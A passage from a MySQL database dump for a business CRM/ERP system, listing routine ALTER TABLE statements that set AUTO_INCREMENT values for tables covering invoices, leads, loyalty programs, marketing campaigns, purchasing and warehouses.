--
-- AUTO_INCREMENT for table `tblinternal_delivery_note`
--
ALTER TABLE `tblinternal_delivery_note`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblinternal_delivery_note_detail`
--
ALTER TABLE `tblinternal_delivery_note_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblinventory_commodity_min`
--
ALTER TABLE `tblinventory_commodity_min`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=309;

--
-- AUTO_INCREMENT for table `tblinventory_manage`
--
ALTER TABLE `tblinventory_manage`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=16;

--
-- AUTO_INCREMENT for table `tblinvoicepaymentrecords`
--
ALTER TABLE `tblinvoicepaymentrecords`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=409;

--
-- AUTO_INCREMENT for table `tblinvoices`
--
ALTER TABLE `tblinvoices`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=402;

--
-- AUTO_INCREMENT for table `tblitemable`
--
ALTER TABLE `tblitemable`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1272;

--
-- AUTO_INCREMENT for table `tblitems`
--
ALTER TABLE `tblitems`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1971;

--
-- AUTO_INCREMENT for table `tblitems_groups`
--
ALTER TABLE `tblitems_groups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblitems_of_vendor`
--
ALTER TABLE `tblitems_of_vendor`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblitem_tax`
--
ALTER TABLE `tblitem_tax`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=228;

--
-- AUTO_INCREMENT for table `tbljob_position`
--
ALTER TABLE `tbljob_position`
  MODIFY `position_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblknowedge_base_article_feedback`
--
ALTER TABLE `tblknowedge_base_article_feedback`
  MODIFY `articleanswerid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblknowledge_base`
--
ALTER TABLE `tblknowledge_base`
  MODIFY `articleid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblknowledge_base_groups`
--
ALTER TABLE `tblknowledge_base_groups`
  MODIFY `groupid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblleads`
--
ALTER TABLE `tblleads`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=332;

--
-- AUTO_INCREMENT for table `tblleads_email_integration`
--
ALTER TABLE `tblleads_email_integration`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'the ID always must be 1', AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblleads_sources`
--
ALTER TABLE `tblleads_sources`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblleads_status`
--
ALTER TABLE `tblleads_status`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tbllead_activity_log`
--
ALTER TABLE `tbllead_activity_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=959;

--
-- AUTO_INCREMENT for table `tbllead_integration_emails`
--
ALTER TABLE `tbllead_integration_emails`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tbllistemails`
--
ALTER TABLE `tbllistemails`
  MODIFY `emailid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tbllist_widget`
--
ALTER TABLE `tbllist_widget`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_card`
--
ALTER TABLE `tblloy_card`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblloy_mbs_program`
--
ALTER TABLE `tblloy_mbs_program`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_mbs_rule`
--
ALTER TABLE `tblloy_mbs_rule`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblloy_program_detail`
--
ALTER TABLE `tblloy_program_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_program_discount_log`
--
ALTER TABLE `tblloy_program_discount_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_redeem_log`
--
ALTER TABLE `tblloy_redeem_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_redemp_detail`
--
ALTER TABLE `tblloy_redemp_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_rule`
--
ALTER TABLE `tblloy_rule`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_rule_detail`
--
ALTER TABLE `tblloy_rule_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_transation`
--
ALTER TABLE `tblloy_transation`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblloy_voucher_inv_log`
--
ALTER TABLE `tblloy_voucher_inv_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblmaillistscustomfields`
--
ALTER TABLE `tblmaillistscustomfields`
  MODIFY `customfieldid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblmaillistscustomfieldvalues`
--
ALTER TABLE `tblmaillistscustomfieldvalues`
  MODIFY `customfieldvalueid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblmail_queue`
--
ALTER TABLE `tblmail_queue`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2531;

--
-- AUTO_INCREMENT for table `tblmanage_leave`
--
ALTER TABLE `tblmanage_leave`
  MODIFY `leave_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_assets`
--
ALTER TABLE `tblma_assets`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblma_asset_download_logs`
--
ALTER TABLE `tblma_asset_download_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblma_campaigns`
--
ALTER TABLE `tblma_campaigns`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblma_campaign_flows`
--
ALTER TABLE `tblma_campaign_flows`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_campaign_lead_exceptions`
--
ALTER TABLE `tblma_campaign_lead_exceptions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_categories`
--
ALTER TABLE `tblma_categories`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=13;

--
-- AUTO_INCREMENT for table `tblma_emails`
--
ALTER TABLE `tblma_emails`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=14;

--
-- AUTO_INCREMENT for table `tblma_email_click_logs`
--
ALTER TABLE `tblma_email_click_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_email_logs`
--
ALTER TABLE `tblma_email_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_email_templates`
--
ALTER TABLE `tblma_email_templates`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=19;

--
-- AUTO_INCREMENT for table `tblma_forms`
--
ALTER TABLE `tblma_forms`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblma_lead_segments`
--
ALTER TABLE `tblma_lead_segments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_lead_stages`
--
ALTER TABLE `tblma_lead_stages`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_marketing_messages`
--
ALTER TABLE `tblma_marketing_messages`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_point_actions`
--
ALTER TABLE `tblma_point_actions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblma_point_action_logs`
--
ALTER TABLE `tblma_point_action_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_point_triggers`
--
ALTER TABLE `tblma_point_triggers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_segments`
--
ALTER TABLE `tblma_segments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblma_segment_filters`
--
ALTER TABLE `tblma_segment_filters`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;

--
-- AUTO_INCREMENT for table `tblma_sms`
--
ALTER TABLE `tblma_sms`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_sms_logs`
--
ALTER TABLE `tblma_sms_logs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblma_stages`
--
ALTER TABLE `tblma_stages`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblma_text_messages`
--
ALTER TABLE `tblma_text_messages`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblmilestones`
--
ALTER TABLE `tblmilestones`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblmodules`
--
ALTER TABLE `tblmodules`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=27;

--
-- AUTO_INCREMENT for table `tblnewsfeed_comment_likes`
--
ALTER TABLE `tblnewsfeed_comment_likes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblnewsfeed_posts`
--
ALTER TABLE `tblnewsfeed_posts`
  MODIFY `postid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblnewsfeed_post_comments`
--
ALTER TABLE `tblnewsfeed_post_comments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblnewsfeed_post_likes`
--
ALTER TABLE `tblnewsfeed_post_likes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblnotes`
--
ALTER TABLE `tblnotes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=36;

--
-- AUTO_INCREMENT for table `tblnotifications`
--
ALTER TABLE `tblnotifications`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4596;

--
-- AUTO_INCREMENT for table `tblomni_cart_payment`
--
ALTER TABLE `tblomni_cart_payment`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_create_customer_report`
--
ALTER TABLE `tblomni_create_customer_report`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_create_customer_report_detail`
--
ALTER TABLE `tblomni_create_customer_report_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_customer_report`
--
ALTER TABLE `tblomni_customer_report`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_log_discount`
--
ALTER TABLE `tblomni_log_discount`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_log_sync_woo`
--
ALTER TABLE `tblomni_log_sync_woo`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_master_channel_woocommere`
--
ALTER TABLE `tblomni_master_channel_woocommere`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_pre_order_product_setting`
--
ALTER TABLE `tblomni_pre_order_product_setting`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_refunds`
--
ALTER TABLE `tblomni_refunds`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_setting_woo_store`
--
ALTER TABLE `tblomni_setting_woo_store`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_shift`
--
ALTER TABLE `tblomni_shift`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_shift_history`
--
ALTER TABLE `tblomni_shift_history`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblomni_trade_discount`
--
ALTER TABLE `tblomni_trade_discount`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tbloptions`
--
ALTER TABLE `tbloptions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=738;

--
-- AUTO_INCREMENT for table `tblpayment_attempts`
--
ALTER TABLE `tblpayment_attempts`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpayment_modes`
--
ALTER TABLE `tblpayment_modes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblpayroll_table`
--
ALTER TABLE `tblpayroll_table`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpayroll_type`
--
ALTER TABLE `tblpayroll_type`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpinned_projects`
--
ALTER TABLE `tblpinned_projects`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblprojectdiscussioncomments`
--
ALTER TABLE `tblprojectdiscussioncomments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblprojectdiscussions`
--
ALTER TABLE `tblprojectdiscussions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblprojects`
--
ALTER TABLE `tblprojects`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;

--
-- AUTO_INCREMENT for table `tblproject_activity`
--
ALTER TABLE `tblproject_activity`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=196;

--
-- AUTO_INCREMENT for table `tblproject_files`
--
ALTER TABLE `tblproject_files`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=28;

--
-- AUTO_INCREMENT for table `tblproject_members`
--
ALTER TABLE `tblproject_members`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=39;

--
-- AUTO_INCREMENT for table `tblproject_notes`
--
ALTER TABLE `tblproject_notes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblproject_settings`
--
ALTER TABLE `tblproject_settings`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=514;

--
-- AUTO_INCREMENT for table `tblproposals`
--
ALTER TABLE `tblproposals`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=32;

--
-- AUTO_INCREMENT for table `tblproposal_comments`
--
ALTER TABLE `tblproposal_comments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblprovince_city`
--
ALTER TABLE `tblprovince_city`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpurchase_option`
--
ALTER TABLE `tblpurchase_option`
  MODIFY `option_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=14;

--
-- AUTO_INCREMENT for table `tblpur_activity_log`
--
ALTER TABLE `tblpur_activity_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_approval_details`
--
ALTER TABLE `tblpur_approval_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_approval_setting`
--
ALTER TABLE `tblpur_approval_setting`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblpur_comments`
--
ALTER TABLE `tblpur_comments`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_contacts`
--
ALTER TABLE `tblpur_contacts`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_contracts`
--
ALTER TABLE `tblpur_contracts`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_debits`
--
ALTER TABLE `tblpur_debits`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_debits_refunds`
--
ALTER TABLE `tblpur_debits_refunds`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_debit_notes`
--
ALTER TABLE `tblpur_debit_notes`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_estimates`
--
ALTER TABLE `tblpur_estimates`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_estimate_detail`
--
ALTER TABLE `tblpur_estimate_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_invoices`
--
ALTER TABLE `tblpur_invoices`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_invoice_details`
--
ALTER TABLE `tblpur_invoice_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_invoice_payment`
--
ALTER TABLE `tblpur_invoice_payment`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_orders`
--
ALTER TABLE `tblpur_orders`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblpur_order_detail`
--
ALTER TABLE `tblpur_order_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblpur_order_payment`
--
ALTER TABLE `tblpur_order_payment`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_request`
--
ALTER TABLE `tblpur_request`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblpur_request_detail`
--
ALTER TABLE `tblpur_request_detail`
  MODIFY `prd_id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblpur_unit`
--
ALTER TABLE `tblpur_unit`
  MODIFY `unit_id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblpur_vendor`
--
ALTER TABLE `tblpur_vendor`
  MODIFY `userid` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=7;

--
-- AUTO_INCREMENT for table `tblpur_vendor_cate`
--
ALTER TABLE `tblpur_vendor_cate`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblpur_vendor_items`
--
ALTER TABLE `tblpur_vendor_items`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=157;

--
-- AUTO_INCREMENT for table `tblrelated_items`
--
ALTER TABLE `tblrelated_items`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblreminders`
--
ALTER TABLE `tblreminders`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11;

--
-- AUTO_INCREMENT for table `tblreminder_activity`
--
ALTER TABLE `tblreminder_activity`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblreminder_services`
--
ALTER TABLE `tblreminder_services`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblreminder_service_value`
--
ALTER TABLE `tblreminder_service_value`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblrequest`
--
ALTER TABLE `tblrequest`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_approval_details`
--
ALTER TABLE `tblrequest_approval_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_files`
--
ALTER TABLE `tblrequest_files`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_follow`
--
ALTER TABLE `tblrequest_follow`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_form`
--
ALTER TABLE `tblrequest_form`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_log`
--
ALTER TABLE `tblrequest_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_related`
--
ALTER TABLE `tblrequest_related`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_type`
--
ALTER TABLE `tblrequest_type`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_type_form`
--
ALTER TABLE `tblrequest_type_form`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblrequest_type_workflow`
--
ALTER TABLE `tblrequest_type_workflow`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblroles`
--
ALTER TABLE `tblroles`
  MODIFY `roleid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblsalary_form`
--
ALTER TABLE `tblsalary_form`
  MODIFY `form_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblsales_activity`
--
ALTER TABLE `tblsales_activity`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3027;

--
-- AUTO_INCREMENT for table `tblsales_channel`
--
ALTER TABLE `tblsales_channel`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblsales_channel_detailt`
--
ALTER TABLE `tblsales_channel_detailt`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=397;

--
-- AUTO_INCREMENT for table `tblsa_approval_details`
--
ALTER TABLE `tblsa_approval_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_approval_setting`
--
ALTER TABLE `tblsa_approval_setting`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_clients`
--
ALTER TABLE `tblsa_clients`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_client_groups`
--
ALTER TABLE `tblsa_client_groups`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_goods_delivery`
--
ALTER TABLE `tblsa_goods_delivery`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_goods_delivery_detail`
--
ALTER TABLE `tblsa_goods_delivery_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_goods_delivery_invoices_pr_orders`
--
ALTER TABLE `tblsa_goods_delivery_invoices_pr_orders`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_goods_receipt`
--
ALTER TABLE `tblsa_goods_receipt`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_goods_receipt_detail`
--
ALTER TABLE `tblsa_goods_receipt_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_goods_transaction_detail`
--
ALTER TABLE `tblsa_goods_transaction_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_inventory_manage`
--
ALTER TABLE `tblsa_inventory_manage`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_join_program_request`
--
ALTER TABLE `tblsa_join_program_request`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_options`
--
ALTER TABLE `tblsa_options`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_programs`
--
ALTER TABLE `tblsa_programs`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblsa_program_detail`
--
ALTER TABLE `tblsa_program_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblsa_pur_orders`
--
ALTER TABLE `tblsa_pur_orders`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_pur_order_detail`
--
ALTER TABLE `tblsa_pur_order_detail`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_sale_invoices`
--
ALTER TABLE `tblsa_sale_invoices`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_sale_invoice_details`
--
ALTER TABLE `tblsa_sale_invoice_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_sale_invoice_payment`
--
ALTER TABLE `tblsa_sale_invoice_payment`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsa_warehouse`
--
ALTER TABLE `tblsa_warehouse`
  MODIFY `warehouse_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblscheduled_emails`
--
ALTER TABLE `tblscheduled_emails`
